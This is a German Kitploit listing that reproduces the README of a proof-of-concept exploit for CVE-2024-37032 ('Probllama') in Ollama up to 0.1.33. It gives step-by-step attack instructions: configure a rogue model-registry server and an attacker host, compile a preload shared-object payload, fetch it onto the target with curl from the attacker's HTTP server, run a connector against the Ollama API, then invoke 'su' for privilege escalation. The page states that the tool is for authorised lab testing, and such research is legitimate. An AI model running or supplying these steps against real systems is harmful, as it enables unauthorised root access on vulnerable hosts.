Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-37032-PoC — CVE-2024-37032 (Probllama) PoC für Ollama ≤0.1.33: Path-Traversal und Schreiben beliebiger Dateien über die Modell-Digest-Verarbeitung, was zu automatischer Rechteausweitung führt. | Kitploit
Tools/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Privilege EscalationSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC für Ollama ≤0.1.33: Path-Traversal und Schreiben beliebiger Dateien über die Modell-Digest-Verarbeitung, was zu automatischer Rechteausweitung führt.

Repository anzeigen
82vor 2 MonatenNoch nicht geprüft

CVE-2024-37032 Probllama PoC — Ollama Path Traversal und Privilege Escalation

Dieses Repository enthält einen Proof-of-Concept FastAPI-Registrierungsserver, ein Connector-Skript und eine Preload-Demo-Bibliothek für autorisierte Labortests.

Verwenden Sie dies nur auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich Testberechtigung haben.

Dateien

  • server.py: startet den FastAPI PoC-Server.
  • rogue_server/config.py: zentrale Konfiguration für den PoC-Server.
  • connector.py: sendet Pull-/Push-Anfragen an die Ziel-Ollama-API.
  • preload_privs_demo.c: C-Quellcode für das Shared-Object-Payload.
  • requirements.txt: Python-Abhängigkeiten für den PoC-Server.

1. Serverabhängigkeiten installieren

Installieren Sie auf Ihrem Host-Rechner die Python-Abhängigkeiten:

root@kitploit:~
python -m pip install -r requirements.txt

2. Host und Ports konfigurieren

Bearbeiten Sie rogue_server/config.py auf Ihrem Host-Rechner:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Bearbeiten Sie connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Hinweise:

  • SERVER_HOST muss auf den Host verweisen, der server.py ausführt.
  • Wenn der PoC-Server auf Port 8000 läuft, geben Sie den Port sowohl in HOST als auch in SERVER_HOST an, z. B. 10.10.16.160:8000.
  • TARGET_HOST und TARGET_PORT müssen auf die Ziel-Ollama-API verweisen. Wenn connector.py direkt auf dem Zielrechner ausgeführt wird, ist 127.0.0.1:11434 in der Regel korrekt.
  • Wenn Sie rogue_server/config.py ändern, starten Sie den PoC-Server neu.

3. Das Shared Object erstellen

Kompilieren Sie die C-Datei und nennen Sie die Ausgabe libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Dateien auf das Ziel übertragen

Kopieren Sie diese Dateien auf den autorisierten Zielrechner:

  • libpreload_privs_demo.so
  • connector.py

Eine einfache Möglichkeit ist, sie von Ihrem Host-Rechner aus bereitzustellen:

root@kitploit:~
python3 -m http.server 8081

Laden Sie sie dann auf dem Zielrechner herunter:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

Nach dem Herunterladen des Shared Objects kopieren Sie den absoluten Pfad auf dem Zielrechner und setzen denselben Pfad als exploit_path in rogue_server/config.py auf dem Host-Rechner.

Beispiel:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Den PoC-Server starten

Starten Sie den FastAPI-Server auf Ihrem Host-Rechner:

root@kitploit:~
python server.py

Standardmäßig startet dieses Projekt Uvicorn auf 0.0.0.0:8000.

6. Den Connector ausführen

Führen Sie auf dem autorisierten Zielrechner aus:

root@kitploit:~
python3 connector.py

Der Connector sendet Pull- und Push-Anfragen an die konfigurierte Ollama-API.

7. Ergebnis überprüfen

Nachdem der Connector fertig ist, führen Sie aus:

root@kitploit:~
su

In einem anfälligen, korrekt konfigurierten Laborziel sollte der Preload-Pfad verwendet werden und der Privilegienwechsel kann beobachtet werden.

Fehlerbehebung

  • Stellen Sie sicher, dass die Host-Firewall den PoC-Server-Port und den temporären Dateiserver-Port zulässt.
  • Stellen Sie sicher, dass SERVER_HOST in connector.py mit HOST in rogue_server/config.py übereinstimmt.
  • Stellen Sie sicher, dass exploit_path der exakte absolute Pfad ist, unter dem libpreload_privs_demo.so auf dem Zielrechner existiert.
  • Stellen Sie sicher, dass die Ziel-Ollama-API unter TARGET_HOST:TARGET_PORT erreichbar ist.
  • Starten Sie server.py neu, nachdem Sie rogue_server/config.py geändert haben.
Tool herunterladen